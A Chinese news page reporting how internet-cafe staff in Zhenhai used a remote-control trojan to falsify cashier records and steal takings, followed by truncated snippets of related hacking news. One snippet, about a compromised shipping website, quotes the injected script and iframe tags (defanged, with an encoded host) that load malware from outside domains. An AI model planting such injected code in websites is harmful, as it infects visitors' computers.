镇海:网管转身变成黑客 植入木马程序盗窃营业款

  镇海的一名网吧管理员,勾结其他网吧的网管员和收银员,利用木马程序,删除、修改网吧收银数据后偷走营业款。两年多时间,共盗取了营业款16万余元。上周五,镇海法院审理了这样一起盗窃案。

  汪某,江西人,今年28岁,2010年在镇海一家网吧做网管。上班之前,汪某从网上得知,有一种木马程序,只要种植到电脑里,就可以通过远程操控,对网吧的收银系统进行数据修改从而窃取营业款。

  不久,汪某认识了另一个网吧的网管郑某,两人是老乡一见如故。一直对该木马程序非常感兴趣的汪某说服郑某,在郑某所在的网吧里试试这个木马软件。

  通过网上的上家发来木马程序,汪某和郑某将程序装在了郑某所在网吧的服务器上,上家通过远程操控,对网吧当天的营业额成功进行了修改。本来只是想试试这个木马程序灵不灵,试完之后,汪某发现这是一条“财路”。他和郑某又找到网吧的收银员李某,经多次游说,李某同意加入。

  汪某付给上家包月费用,上家再通过木马程序,远程控制调低网吧的营业额,随后3人将实际营业额中多出来的现金用于分赃。一个月下来,汪某3人就从该网吧偷得9000余元的营业款。

  汪某随后又在多家网吧发展网管和收银员加入,从2010年9月至2012年2月,这个团伙多次利用木马程序,盗窃营业款共计16万余元。

  2012年2月,有网吧老板发现营业额有问题,遂报警。很快,汪某被抓捕归案。

  镇海法院判处汪某有期徒刑12年,罚金5万元;郑某被判处有期徒刑4年6个月,罚金10000元;李某判处有期徒刑2年6个月,罚金5000元;本案其他2名网管和7名收银员分别被判处有期徒刑9个月至4年6个月不等,罚金3000至10000元不等。

时间: 2024-10-23 08:28:14

镇海:网管转身变成黑客 植入木马程序盗窃营业款的相关文章

考试院黑客受审认罪否认植入木马程序

否认植入"木马"程序,称扫描时发现网站漏洞 张太凌 ■ "'黑客'入侵网站改成绩被诉"追踪 本报讯 (记者张太凌)北京教育考试院原工作人员孟令建,涉嫌利用木马病毒程序进入北京教育考试院系统,篡改全国计算机等级考试成绩,昨日上午在丰台法院受审.这名北京首名被公诉的"黑客",一改此前拒不认罪的态度,当庭表示对破坏计算机信息系统罪的指控没有异议. 检方指控,2008年12月9日11时33分,孟令建在北京市丰台区帝京路家中,利用木马病毒程序进入北京教育考

公务员考试网被植入木马病毒 已有用户计算机中毒

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 据新华社北京2月11日专电 金山软件公司的反病毒工程师10日晚监测到,国家公务员考试网被黑客植入木马病毒,目前已有用户反馈计算机中毒报告.截至11日中午,国家公务员考试网仍呈带毒状态. 据金山毒霸技术部门分析,国家公务员考试网页被植入的木马正是臭名昭著的"猫癣"新变种.这款变种会利用IE7 0day漏洞.微软access漏

网络安全形势严峻 08年430万IP被植入木马

中介交易 SEO诊断 淘宝客 云主机 技术大厅 据统计,2008年我国网民数量已经近3亿,互联网用户数高居世界第一.同时,互联网普及率达到22.6%,总带宽625G,IP地址1.8亿个,手机上网用户1.17亿.数据大幅增长的背后是信息网络与国民经济的联系日益紧密,购物.交友.获取信息无一不可以通过网络进行,但随之而来的是网络与信息安全问题日益突出,潍坊市40万用户断网也仅仅是冰山一角. 不为人知的数据 ebay是全球知名的电子商务公司,据统计ebay的仿冒网站竟达到333个,汇丰银行(HSBC)

两起利用木马程序破坏收银系统的“黑客”案

本报讯 (记者杨佳彬 通讯员李肇兴 实习生林幼真)将木马植入网吧收银系统,篡改收银记录,后秘密窃取收银款.昨日,市公安局公共信息网络安全监察支队向媒体披露了两起利用木马程序破坏收银系统的"黑客"案,7名犯罪嫌疑人因涉嫌破坏计算机信息系统罪被警方刑事拘留. 案发 交流群露马脚 黑客团伙现身 近日,泉州警方在日常工作中发现,网络上有不少"网吧管理员技术交流群",而这些交流群时常讨论一些如何窃取网吧收银款的话题.为了探明真相,民警随即介入调查.与此同时,警方接到线索举报称

木马程序兴起 90后成为网络盗窃主力

中介交易 SEO诊断 淘宝客 云主机 技术大厅 90后成为网络盗窃主力 奇虎360发布<2007年上半年互联网不安全报告> 上周,3名网络黑客利用"木马程序"非法侵入中国游戏中心系统,在3天的时间陆续将22亿个游戏金币转入自己控制的游戏账号中,随后将游戏金币以低价出售,共获利人民币14万元.幸运的是这一网络盗窃行为很快被破获,几个涉案人员被依法判刑.但同样被木马程序侵害的其它用户就不是那么幸运了,目前网络上有大批的 "银行卡被盗"的网民,组织了各种各样的

中国航运网遭遇挂马 黑客悄悄植入病毒

中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序.被感染病毒的用户系统可能被远程控制,盗取用户敏感信息.甚至导致死机. 该网站问题代码:     <script src=hxxp://%6D%62%72%33%2E%63%6E></script> hxxp://mbr3.cn/问题框架代码:     <iframe src=hxxp://www.wansf.net/a11

黑客进入福彩机房植入木马

本报讯 备受关注的深圳福彩三千万元巨奖诈骗案在有关部门的沉默中留下连串疑问,深圳警方此前曾拒绝了中央.省.市多家媒体的采访.近日,央视<今日说法>栏目却播放了一段对深圳警方的采访.而随着警方的开口,案件留下的连串疑问也终于浮出水面. 怎么做?进入机房操作 而非远程操作 在诸多疑问中,程某如何作案无疑是彩民最为关心的问题.但是警方此前一直以担心被他人按图索骥而未公开详情. 罗湖区公安分局桂园派出所民警徐祥与程波在接受采访时表示,程伟实际上是利用与福彩中心合作的机会,进入了福彩中心的机房,植入了一

当当网疑似被黑客入侵 网络惊现nginx 0day漏洞

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 5月21日消息:发现当当网被nginx 0day漏洞黑掉了,但是黑客未作进一步的破坏行动. 有兴趣的可以查看地址:http://bbs.dangdang.com/attachments/tool.txt 截图为证: 国内顶级安全团队80sec于5.20日下午6点发布了一个关于nginx的漏洞通告,由于该漏洞的存在,使用nginx+php组建的

Redis漏洞攻击植入木马逆向分析

作者:云盾攻防对抗团队 - 梦特 背景 2015年11月10日,我们捕获到黑客大规模利用Redis漏洞,获取机器root权限,并植入木马进行控制,云系统发现大量异地登录来自IP:104.219.234.226.异地登录发现时云盾控制台就会有告警信息,由于该漏洞危害严重,因此我们在2015年11月11日,短信电话联系用户修复Redis高危漏洞,2015年11月14日,我们云盾系统检测到大量受该漏洞影响沦为肉鸡的机器进行DDOS攻击,发现后云盾系统已自动通知用户. 木马控制协议逆向分析 分析发现木马